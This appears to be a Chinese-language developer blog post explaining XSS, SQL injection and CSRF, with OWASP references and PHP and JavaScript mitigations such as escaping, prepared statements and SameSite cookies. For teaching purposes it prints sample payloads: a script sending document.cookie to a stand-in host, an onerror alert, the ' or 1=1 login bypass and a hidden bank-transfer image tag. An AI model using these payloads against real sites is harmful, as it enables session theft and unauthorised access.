<!DOCTYPE html><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>常見的網站攻擊方式 | Yu's Blog</title><link rel="stylesheet" type="text/css" href="/css/normalize.css"><link rel="stylesheet" type="text/css" href="/css/highlight.css"><link rel="stylesheet" type="text/css" href="/css/very-simple.css"><link rel="stylesheet" type="text/css" href="//cdn.bootcss.com/font-awesome/4.5.0/css/font-awesome.min.css"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><meta name="generator" content="Hexo 5.4.0"></head><body><!-- include the sidebar--><!-- include ./includes/sidebar.jade--><!-- Blog title and subtitle--><header><div class="container header"><a id="logo" href="/." class="title">Yu's Blog</a><span class="subtitle">Learning, Writing and Sharing</span><label id="toggle-menu" for="menu" onclick><i class="fa fa-bars"></i></label></div></header><!-- use checkbox hack for toggle nav-bar on small screens--><input id="menu" type="checkbox"><!-- Navigation Links--><nav id="nav"><div class="container"><a href="/" class="sidebar-nav-item active">Home</a><a href="/archives" class="sidebar-nav-item">Archives</a></div></nav><div id="header-margin-bar"></div><!-- gallery that comes before the header--><div class="wrapper"><div class="container post-header"><h1>常見的網站攻擊方式</h1></div></div><div class="wrapper"><div class="container meta"><div class="post-time">2021-03-11</div><div class="post-tags"><a class="post-tag-none-link" href="/tags/CSRF/" rel="tag">CSRF</a>/<a class="post-tag-none-link" href="/tags/SQL-injection/" rel="tag">SQL injection</a>/<a class="post-tag-none-link" href="/tags/XSS/" rel="tag">XSS</a>/<a class="post-tag-none-link" href="/tags/%E8%B3%87%E8%A8%8A%E5%AE%89%E5%85%A8/" rel="tag">資訊安全</a></div></div></div><article><div class="container post"><p>在討論常見的網站攻擊方式之前，可以先認識一下 <strong>OWASP</strong>。</p>
<blockquote>
<p>Open Web Application Security Project</p>
</blockquote>
<p><a target="_blank" rel="noopener" href="https://owasp.org/">OWASP</a> 是一個線上社群，介紹了各種不同的網路安全問題、每幾年的十大安全問題排名跟範例，完全免費，基本上是所有做資訊安全的聖經。</p>
<p>推薦 techbridge 的 <a target="_blank" rel="noopener" href="https://blog.techbridge.cc/2017/05/07/owasp/">這篇文章</a>，講了 2010 及 2013 的前十大網站攻擊排行，以及 <a target="_blank" rel="noopener" href="https://owasp.org/www-pdf-archive/OWASP_Top_10_2017_%E4%B8%AD%E6%96%87%E7%89%88v1.2.pdf">這篇</a> 是官方在 2017 年十大攻擊手法的中文版本。</p>
<h2 id="XSS"><a href="#XSS" class="headerlink" title="XSS"></a>XSS</h2><blockquote>
<p>Cross-Site-Scripting，俗稱 JavaScript Injection，中文被翻成跨站式腳本攻擊或是跨站攻擊。</p>
</blockquote>
<p>XSS 是在使用者可操控的地方，像是留言內容、帳號名稱等地方，惡意寫入程式碼，讓網站載入這些內容時，一起執行這些程式。</p>
<p>常見的可能就是透過插入一個圖片，圖片會自動訪問 hackerhome 上的 grabber.jsp，並將使用者的 cookie 作為 msg 的值，讓受害者的 cookie 遭盜用。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="built_in">document</span>.write(<span class="string">&#x27;&lt;img src=http://www.hackerhome.com/grabber.jsp?msg=&#x27;</span> <span class="built_in">document</span>.cookie <span class="string">&#x27;</span></span><br><span class="line"><span class="string">2     width=0 height=0 border=0 /&gt;SomeStore&#x27;</span>);&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<p>所以要做的事情，就是防範讓伺服器知道這並不是程式碼，而只是一般的文字。可以透過 php 內建的 <code>htmlspecialchars</code> 達成這件事。</p>
<p>但要特別注意的是，並不是像 hash 一樣，在輸入密碼後就馬上處理並將 hash 過的內容存在資料庫，而是儲存原本的字元在資料庫，輸出時再經由<code>htmlspecialchars</code> 轉化。因為輸入防不勝防，直接解決輸出才能打到痛點。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// utils.php</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">escape</span>(<span class="params"><span class="variable">$str</span></span>) </span>&#123; <span class="comment">// 之後就可以呼叫 escape()</span></span><br><span class="line">  <span class="keyword">return</span> htmlspecialchars(<span class="variable">$str</span>, ENT_QUOTES);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// index.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;div class=&#x27;comment__info--name&#x27;&gt;&quot;</span> . escape(<span class="variable">$row</span>[<span class="string">&#x27;nickname&#x27;</span>]) . <span class="string">&quot;&lt;/div&gt;&quot;</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">&quot;&lt;textarea class=&#x27;comment__text&#x27;&gt;&quot;</span> . escape(<span class="variable">$row</span>[<span class="string">&#x27;text&#x27;</span>]) . <span class="string">&quot;&lt;/textarea&gt;&quot;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h3 id="儲存型"><a href="#儲存型" class="headerlink" title="儲存型"></a>儲存型</h3><blockquote>
<p>stored XSS，或被稱為 persisted XSS</p>
</blockquote>
<p>以輸入惡意、並會儲存到資料庫的資料方式攻擊，這種稱為儲存型 XSS，也就是前面提到的攻擊方式。</p>
<p>一般多以這種攻擊方式，因為這種攻擊方式的網址正常，只要成功攻擊，一般使用者只要點入就很有可能被竊取資料、或是被轉到其他網站。</p>
<h3 id="反射型"><a href="#反射型" class="headerlink" title="反射型"></a>反射型</h3><blockquote>
<p>Reflected XSS</p>
</blockquote>
<p>反射型是利用有些網站會將 query string 的內容，直接顯示在螢幕上作為提示文字，竄改 query string 的內容，將惡意程式碼放入 query string 達到攻擊目的。</p>
<p>但這種方式需要刻意讓使用者點選帶有奇怪程式碼的網址，所以一般比較少見。</p>
<h3 id="DOM-XSS"><a href="#DOM-XSS" class="headerlink" title="DOM XSS"></a>DOM XSS</h3><blockquote>
<p>DOM-Based XSS（基於 DOM 的 XSS 類型）</p>
</blockquote>
<p>透過程式碼當中 DOM 節點的 <code>.html</code> 或是 <code>.innerHtml</code> 漏洞，即可輸入 HTML 標籤，也就是可輸入 <code>&lt;script&gt;</code> <code>&lt;img&gt;</code> 標籤，將惡意程式碼帶入。</p>
<p>跟前面兩種 XSS 攻擊手法比較不一樣，前面兩種主要防範方式都是從後端，但 DOM XSS 從前端就可以簡單防範，直接看範例：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">h3</span>&gt;</span>Hi，<span class="tag">&lt;<span class="name">span</span> <span class="attr">class</span>=<span class="string">&quot;show_name&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">span</span>&gt;</span><span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 這裡會顯示輸入的名稱 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">&quot;name&quot;</span> <span class="attr">type</span>=<span class="string">&quot;text&quot;</span> /&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 輸入名稱 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">button</span> <span class="attr">onClick</span>=<span class="string">&quot;createText();&quot;</span>&gt;</span>Say Hi<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 執行 createText() --&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">  <span class="keyword">let</span> createText = <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="javascript">    <span class="keyword">let</span> name = <span class="built_in">document</span>.querySelector(<span class="string">&quot;#name&quot;</span>);</span></span><br><span class="line"><span class="javascript">    <span class="built_in">document</span>.querySelector(<span class="string">&quot;.show_name&quot;</span>).innerHTML = name; <span class="comment">// 漏洞在這裡</span></span></span><br><span class="line">  &#125;;</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>如果沒有檢查輸入，輸入可填入以下內容即可輕鬆執行程式碼。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src&#x3D;# onerror&#x3D;&quot;alert(123)&quot; &#x2F;&gt;</span><br></pre></td></tr></table></figure>

<p>解決方法其實很簡單，只要把 <code>.html</code> 或是 <code>.innerHtml</code> 都改成 <code>.text</code> 及 <code>innerText</code> 就可以了。</p>
<h2 id="SQL-Injection"><a href="#SQL-Injection" class="headerlink" title="SQL Injection"></a>SQL Injection</h2><blockquote>
<p>被譯為 SQL 注入或是 SQL 隱碼</p>
</blockquote>
<p>SQL Injection 一直是 OWASP 的常勝軍。使用的原理也相似，都是透過原本應該輸入文字或帳密等欄位，輸入了程式碼進去。</p>
<p>跟 XSS 不一樣的是，SQL Injection 是輸入 SQL 的語法，而 XSS 多半是輸入 JS 及 HTML 的語法。</p>
<p>一個有會員登入功能的網站，都會需要輸入帳號與密碼來進行驗證。而後端程式，如 PHP 就必需支援相關的登入檢查，判定 User 輸入的帳號、密碼是否正確，來確定登入是否成功。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> members <span class="keyword">where</span> account<span class="operator">=</span><span class="string">&#x27;$name&#x27;</span> <span class="keyword">and</span> password<span class="operator">=</span><span class="string">&#x27;$password&#x27;</span></span><br></pre></td></tr></table></figure>

<p>但若是駭客輸入有特殊字元的帳號：「 ‘ or 1=1 /* 」，密碼：「任意值」，這時 SQL 語法就會變成：</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> members <span class="keyword">where</span> account<span class="operator">=</span><span class="string">&#x27;&#x27;</span> <span class="keyword">or</span> <span class="number">1</span><span class="operator">=</span><span class="number">1</span> <span class="comment">/*&#x27; and password=&#x27;&#x27;</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">where 條件變成 account = 空值或是 1=1 是 true 的話</span></span><br><span class="line"><span class="comment">1=1 一定是 true 所以就可以成功登入</span></span><br><span class="line"><span class="comment">而且會發現後面被註解掉了</span></span><br><span class="line"><span class="comment">（透過這樣拿到的值通常是資料表第一筆）</span></span><br></pre></td></tr></table></figure>

<p>這時候可以透過 MySQL 內建的語法 <strong>Prepared Statements</strong> 來解決這個問題。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// add.php</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// 原本用 sprintf() 拼接，現在刪掉並將變數值換成 ?</span></span><br><span class="line"><span class="variable">$sql</span> = <span class="string">&quot;INSERT INTO yu_comments(user_id, text) VALUES (?, ?)&quot;</span>;</span><br><span class="line"><span class="comment">// stmt 是 statement 的常見縮寫</span></span><br><span class="line"><span class="variable">$stmt</span> = <span class="variable">$conn</span>-&gt;prepare(<span class="variable">$sql</span>);</span><br><span class="line"><span class="comment">// 將參數依序放進，第一個代表有兩個參數，一個是 i (interger)，一個是 s (string)</span></span><br><span class="line"><span class="variable">$stmt</span>-&gt;bind_param(<span class="string">&#x27;is&#x27;</span>, <span class="variable">$user_id</span>, <span class="variable">$text</span>);</span><br><span class="line"><span class="comment">// 最後執行</span></span><br><span class="line"><span class="variable">$result</span> = <span class="variable">$stmt</span>-&gt;execute();</span><br><span class="line"></span><br><span class="line"><span class="comment">//...其他照常...</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// login.php</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">//...上面照常...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 改成問號</span></span><br><span class="line">  <span class="variable">$sql</span> =  <span class="string">&quot;SELECT * FROM yu_users WHERE username=?&quot;</span></span><br><span class="line">  <span class="variable">$stmt</span> = <span class="variable">$conn</span>-&gt;prepare(<span class="variable">$sql</span>);</span><br><span class="line">  <span class="comment">// 只有一個字串</span></span><br><span class="line">  <span class="variable">$stmt</span>-&gt;bind_param(<span class="string">&#x27;s&#x27;</span>, <span class="variable">$username</span>);</span><br><span class="line">  <span class="variable">$result</span> = <span class="variable">$stmt</span>-&gt;execute();</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span>(!<span class="variable">$result</span>) &#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="variable">$conn</span>-&gt;error);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 這裡記得要透過 get_result() 拿到資料</span></span><br><span class="line">  <span class="variable">$result</span> = <span class="variable">$stmt</span>-&gt;get_result();</span><br><span class="line">  <span class="comment">// 這裡開始底下如舊</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="variable">$result</span>-&gt;num_rows === <span class="number">0</span>) &#123;</span><br><span class="line">    header(<span class="string">&#x27;Location: login_page.php?errcode=2&#x27;</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="variable">$row</span> = <span class="variable">$result</span>-&gt;fetch_assoc();</span><br><span class="line">  <span class="keyword">if</span> (password_verify(<span class="variable">$password</span>, <span class="variable">$row</span>[<span class="string">&#x27;password&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="string">&#x27;username&#x27;</span>] = <span class="variable">$username</span>;</span><br><span class="line">    header(<span class="string">&#x27;Location: index.php&#x27;</span>);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    header(<span class="string">&#x27;Location: login_page.php?errcode=2&#x27;</span>);</span><br><span class="line">  &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>幾件事情要注意：</p>
<ul>
<li>只要有 SQL 語法都要改成 prepared statements。</li>
<li>透過 <code>bind_param()</code> 拼接時記得第一個參數，如果要拼接三個字串是 <code>&#39;sss&#39;</code>; 第一個是字串第二個是整數第三個是字串是 <code>&#39;sis&#39;</code>。</li>
</ul>
<h2 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h2><blockquote>
<p>Cross Site Request Forgery，跨站請求偽造</p>
</blockquote>
<p>假設我們今天登入 A 網站後沒有自行登出，A 網站會透過 Cookie 記住身分，讓我們下次進入網站的時候不需要再登入一次。但駭客其實可以透過這點，讓你誤點選設計好的 B 網站，透過在進入 B 網站時自動發送假的 request 到 A 網站，A 網站的 Server 端會以為這是我們本人發送的，就可以成功執行 request。</p>
<p>舉例來說，假設我們今天登入了 mybank.com 網站後沒有登出，只要有心人士惡意讓我們點了 myvideo.com 網站：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;https://mybank.com/transfer?id=11&amp;amount=100&quot;</span> <span class="attr">width</span>=<span class="string">&quot;0&quot;</span> <span class="attr">height</span>=<span class="string">&quot;0&quot;</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">&quot;https://myvideo.com&quot;</span>&gt;</span>影片連結<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>如果網站沒有做其他驗證的話，其實很有可能就可以直接轉帳出去了。</p>
<h3 id="Double-Submit-Cookie"><a href="#Double-Submit-Cookie" class="headerlink" title="Double Submit Cookie"></a>Double Submit Cookie</h3><p>駭客跟使用者是使用不同的網域，也就是說駭客沒有辦法設定該網域的 Cookie，所以其實可以透過這一點來防範這件事。</p>
<p>由 client side 來生 CSRF token，並且把這個 CSRF token 放進表單及 Cookie 中，在收到 request 的時候 server 再去比對是否有值且相同。</p>
<p>但這還是有可能會遭到破解，如果駭客進入到了子網域中，根據 Cookie 設定規範，子網域能夠存取父網域的 Cookie，還是有可能可以成功被破解。</p>
<h3 id="Samesite"><a href="#Samesite" class="headerlink" title="Samesite"></a>Samesite</h3><p>瀏覽器本身就有提供防範 CSRF 的機制，而且很簡單。只要在設定 Cookie 的時候多加一個 SameSite 就好了，用意是讓 Cookie 只允許 same site 使用，不應該在任何的跨網域的 request 被加上去。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Set-Cookie: session_id&#x3D;ewfewjf23o1; SameSite &#x2F;&#x2F; 預設模式為 SameSite&#x3D;strict</span><br><span class="line">Set-Cookie: session_id&#x3D;ewfewjf23o1; SameSite&#x3D;Lax &#x2F;&#x2F; 或是自行設定為 Lax</span><br></pre></td></tr></table></figure>

<p>透過瀏覽器設定的方式是目前最推薦的做法，<code>Lax</code> 與 <code>strict</code> 的差別，及更詳細資訊可參考 <a target="_blank" rel="noopener" href="https://blog.techbridge.cc/2017/02/25/csrf-introduction/">這篇文章</a>，這邊的筆記也都是參考此篇文章的。</p>
<h2 id="有趣的測試小遊戲"><a href="#有趣的測試小遊戲" class="headerlink" title="有趣的測試小遊戲"></a>有趣的測試小遊戲</h2><p>這幾個遊戲都是讓你練習該如何學習駭客透過 XSS 及其他方式執行程式碼。</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://xss-game.appspot.com/">https://xss-game.appspot.com/</a> (<a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=MMMkvHwqPRY">解題影片</a>)</li>
<li><a target="_blank" rel="noopener" href="http://xss-quiz.int21h.jp/">http://xss-quiz.int21h.jp/</a> (可能會被 chrome 擋下來，可以試著用其他瀏覽器玩)</li>
<li><a target="_blank" rel="noopener" href="http://www.hackertest.net/">http://www.hackertest.net/</a></li>
</ul>
<h2 id="資料來源"><a href="#資料來源" class="headerlink" title="資料來源"></a>資料來源</h2><ul>
<li><a target="_blank" rel="noopener" href="https://forum.gamer.com.tw/Co.php?bsn=60292&sn=11267">【網頁安全】給網頁開發新人的 XSS 攻擊介紹與防範</a></li>
<li><a target="_blank" rel="noopener" href="https://www.puritys.me/docs-blog/article-11-SQL-Injection-%E5%B8%B8%E8%A6%8B%E7%9A%84%E9%A7%AD%E5%AE%A2%E6%94%BB%E6%93%8A%E6%96%B9%E5%BC%8F.html">SQL Injection 常見的駭客攻擊方式</a></li>
</ul>
<h2 id="補充資料"><a href="#補充資料" class="headerlink" title="補充資料"></a>補充資料</h2><ul>
<li><a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000016551188">前端安全系列（一）：如何防止 XSS 攻击？</a></li>
<li><a target="_blank" rel="noopener" href="https://medium.com/@jaydenlin/%E6%B7%BA%E8%AB%87%E9%A7%AD%E5%AE%A2%E6%94%BB%E6%93%8A-%E7%B6%B2%E7%AB%99%E5%AE%89%E5%85%A8-%E4%B8%80%E6%AC%A1%E7%9C%8B%E6%87%82-sql-injection-%E7%9A%84%E6%94%BB%E6%93%8A%E5%8E%9F%E7%90%86-b1994fd2392a">一次看懂 SQL Injection 的攻擊原理</a></li>
</ul>
</div><!-- comment system--><div class="container"><hr></div></article><footer id="footer"><div class="container"><div class="bar"><div class="social"><a href="/atom.xml" target="_blank"><i class="fa fa-rss"></i></a></div><div class="footer">© 2021 <a href="/" rel="nofollow">Yu</a>. Powered by <a rel="nofollow" target="_blank" href="https://hexo.io">Hexo</a>. Theme <a target="_blank" href="https://github.com/lotabout/very-simple">very-simple</a>.</div></div></div></footer><link rel="stylesheet" type="text/css" href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.css"><script src="//cdn.bootcss.com/jquery/2.0.3/jquery.min.js"></script><script src="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.pack.js"></script><script>$(document).ready(function() {
    $(".fancybox").fancybox();
});
</script></body></html>